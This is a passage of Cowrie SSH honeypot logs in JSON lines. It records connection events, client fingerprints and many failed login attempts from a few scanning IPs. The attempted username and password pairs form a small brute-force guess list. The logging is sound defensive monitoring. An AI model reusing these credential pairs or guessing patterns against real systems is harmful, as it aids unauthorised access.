256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:07:54.959916Z","src_ip":"51.79.164.132","session":"3be91b53a1b0"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:07:55.382037Z","src_ip":"185.93.89.7","session":"1fab32510e4d"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp123","message":"login attempt [uftp/uftp123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:07:56.530249Z","src_ip":"51.79.164.132","session":"3be91b53a1b0"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:07:58.055653Z","src_ip":"51.79.164.132","session":"3be91b53a1b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63696,"dst_ip":"1.2.3.4","dst_port":22,"session":"7524e3f68b3c","protocol":"ssh","message":"New connection: 212.227.235.229:63696 (1.2.3.4:22) [session: 7524e3f68b3c]","sensor":"my-vps","timestamp":"2025-08-28T09:08:03.277884Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T09:08:03.278723Z","src_ip":"212.227.235.229","session":"7524e3f68b3c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T09:08:03.437613Z","src_ip":"212.227.235.229","session":"7524e3f68b3c"}
{"eventid":"cowrie.login.failed","username":"chasity","password":"chasity","message":"login attempt [chasity/chasity] failed","sensor":"my-vps","timestamp":"2025-08-28T09:08:04.176012Z","src_ip":"212.227.235.229","session":"7524e3f68b3c"}
{"eventid":"cowrie.login.failed","username":"chasity","password":"chasity1","message":"login attempt [chasity/chasity1] failed","sensor":"my-vps","timestamp":"2025-08-28T09:08:05.338409Z","src_ip":"212.227.235.229","session":"7524e3f68b3c"}
{"eventid":"cowrie.login.failed","username":"chasity","password":"chasity123","message":"login attempt [chasity/chasity123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:08:06.500919Z","src_ip":"212.227.235.229","session":"7524e3f68b3c"}
{"eventid":"cowrie.login.failed","username":"chasity","password":"chasity1234","message":"login attempt [chasity/chasity1234] failed","sensor":"my-vps","timestamp":"2025-08-28T09:08:07.654074Z","src_ip":"212.227.235.229","session":"7524e3f68b3c"}
{"eventid":"cowrie.login.failed","username":"chasity","password":"chasity12345","message":"login attempt [chasity/chasity12345] failed","sensor":"my-vps","timestamp":"2025-08-28T09:08:08.815944Z","src_ip":"212.227.235.229","session":"7524e3f68b3c"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:08:09.979037Z","src_ip":"212.227.235.229","session":"7524e3f68b3c"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":58612,"dst_ip":"1.2.3.4","dst_port":22,"session":"bca5ac5784c7","protocol":"ssh","message":"New connection: 185.93.89.7:58612 (1.2.3.4:22) [session: bca5ac5784c7]","sensor":"my-vps","timestamp":"2025-08-28T09:08:19.018727Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:08:19.019612Z","src_ip":"185.93.89.7","session":"bca5ac5784c7"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:08:19.037689Z","src_ip":"185.93.89.7","session":"bca5ac5784c7"}
{"eventid":"cowrie.login.failed","username":"index","password":"abc123","message":"login attempt [index/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:08:19.082258Z","src_ip":"185.93.89.7","session":"bca5ac5784c7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:08:20.109330Z","src_ip":"185.93.89.7","session":"bca5ac5784c7"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":59184,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae54fa51b378","protocol":"ssh","message":"New connection: 51.79.164.132:59184 (1.2.3.4:22) [session: ae54fa51b378]","sensor":"my-vps","timestamp":"2025-08-28T09:08:20.431791Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:08:20.520155Z","src_ip":"51.79.164.132","session":"ae54fa51b378"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:08:21.006014Z","src_ip":"51.79.164.132","session":"ae54fa51b378"}
{"eventid":"cowrie.login.failed","username":"data","password":"data","message":"login attempt [data/data] failed","sensor":"my-vps","timestamp":"2025-08-28T09:08:22.363168Z","src_ip":"51.79.164.132","session":"ae54fa51b378"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:08:23.900484Z","src_ip":"51.79.164.132","session":"ae54fa51b378"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35016,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ed7c833607a","protocol":"ssh","message":"New connection: 212.227.235.229:35016 (1.2.3.4:22) [session: 8ed7c833607a]","sensor":"my-vps","timestamp":"2025-08-28T09:08:30.728662Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T09:08:30.729320Z","src_ip":"212.227.235.229","session":"8ed7c833607a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T09:08:30.833537Z","src_ip":"212.227.235.229","session":"8ed7c833607a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"antigone","message":"login attempt [admin/antigone] failed","sensor":"my-vps","timestamp":"2025-08-28T09:08:31.330314Z","src_ip":"212.227.235.229","session":"8ed7c833607a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"angelok","message":"login attempt [admin/angelok] failed","sensor":"my-vps","timestamp":"2025-08-28T09:08:32.438119Z","src_ip":"212.227.235.229","session":"8ed7c833607a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"angele","message":"login attempt [admin/angele] failed","sensor":"my-vps","timestamp":"2025-08-28T09:08:33.545270Z","src_ip":"212.227.235.229","session":"8ed7c833607a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"amnesia","message":"login attempt [admin/amnesia] failed","sensor":"my-vps","timestamp":"2025-08-28T09:08:34.651594Z","src_ip":"212.227.235.229","session":"8ed7c833607a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"allyson","message":"login attempt [admin/allyson] failed","sensor":"my-vps","timestamp":"2025-08-28T09:08:35.757944Z","src_ip":"212.227.235.229","session":"8ed7c833607a"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:08:36.864254Z","src_ip":"212.227.235.229","session":"8ed7c833607a"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":60488,"dst_ip":"1.2.3.4","dst_port":22,"session":"5292e49846d4","protocol":"ssh","message":"New connection: 185.93.89.7:60488 (1.2.3.4:22) [session: 5292e49846d4]","sensor":"my-vps","timestamp":"2025-08-28T09:08:43.372505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:08:43.373617Z","src_ip":"185.93.89.7","session":"5292e49846d4"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:08:43.392226Z","src_ip":"185.93.89.7","session":"5292e49846d4"}
{"eventid":"cowrie.login.failed","username":"index","password":"1234567","message":"login attempt [index/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T09:08:43.439227Z","src_ip":"185.93.89.7","session":"5292e49846d4"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:08:44.461013Z","src_ip":"185.93.89.7","session":"5292e49846d4"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":60228,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0373cf3ce32","protocol":"ssh","message":"New connection: 51.79.164.132:60228 (1.2.3.4:22) [session: b0373cf3ce32]","sensor":"my-vps","timestamp":"2025-08-28T09:08:46.186460Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:08:46.288242Z","src_ip":"51.79.164.132","session":"b0373cf3ce32"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:08:46.702201Z","src_ip":"51.79.164.132","session":"b0373cf3ce32"}
{"eventid":"cowrie.login.failed","username":"bigdata","password":"bigdata","message":"login attempt [bigdata/bigdata] failed","sensor":"my-vps","timestamp":"2025-08-28T09:08:47.985491Z","src_ip":"51.79.164.132","session":"b0373cf3ce32"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:08:49.636443Z","src_ip":"51.79.164.132","session":"b0373cf3ce32"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":53792,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d85acc5c8ef","protocol":"ssh","message":"New connection: 185.93.89.7:53792 (1.2.3.4:22) [session: 6d85acc5c8ef]","sensor":"my-vps","timestamp":"2025-08-28T09:09:07.029436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:09:07.066080Z","src_ip":"185.93.89.7","session":"6d85acc5c8ef"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:09:07.067033Z","src_ip":"185.93.89.7","session":"6d85acc5c8ef"}
{"eventid":"cowrie.login.failed","username":"index","password":"1q2w3e4r","message":"login attempt [index/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-08-28T09:09:07.141287Z","src_ip":"185.93.89.7","session":"6d85acc5c8ef"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:09:08.161306Z","src_ip":"185.93.89.7","session":"6d85acc5c8ef"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":35984,"dst_ip":"1.2.3.4","dst_port":22,"session":"61a052e5cab2","protocol":"ssh","message":"New connection: 51.79.164.132:35984 (1.2.3.4:22) [session: 61a052e5cab2]","sensor":"my-vps","timestamp":"2025-08-28T09:09:12.087321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:09:12.173016Z","src_ip":"51.79.164.132","session":"61a052e5cab2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:09:12.509949Z","src_ip":"51.79.164.132","session":"61a052e5cab2"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@wsx","message":"login attempt [oracle/!QAZ@wsx] failed","sensor":"my-vps","timestamp":"2025-08-28T09:09:13.978948Z","src_ip":"51.79.164.132","session":"61a052e5cab2"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:09:15.704905Z","src_ip":"51.79.164.132","session":"61a052e5cab2"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":44900,"dst_ip":"1.2.3.4","dst_port":22,"session":"827243331a02","protocol":"ssh","message":"New connection: 185.93.89.7:44900 (1.2.3.4:22) [session: 827243331a02]","sensor":"my-vps","timestamp":"2025-08-28T09:09:31.494829Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:09:31.495754Z","src_ip":"185.93.89.7","session":"827243331a02"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-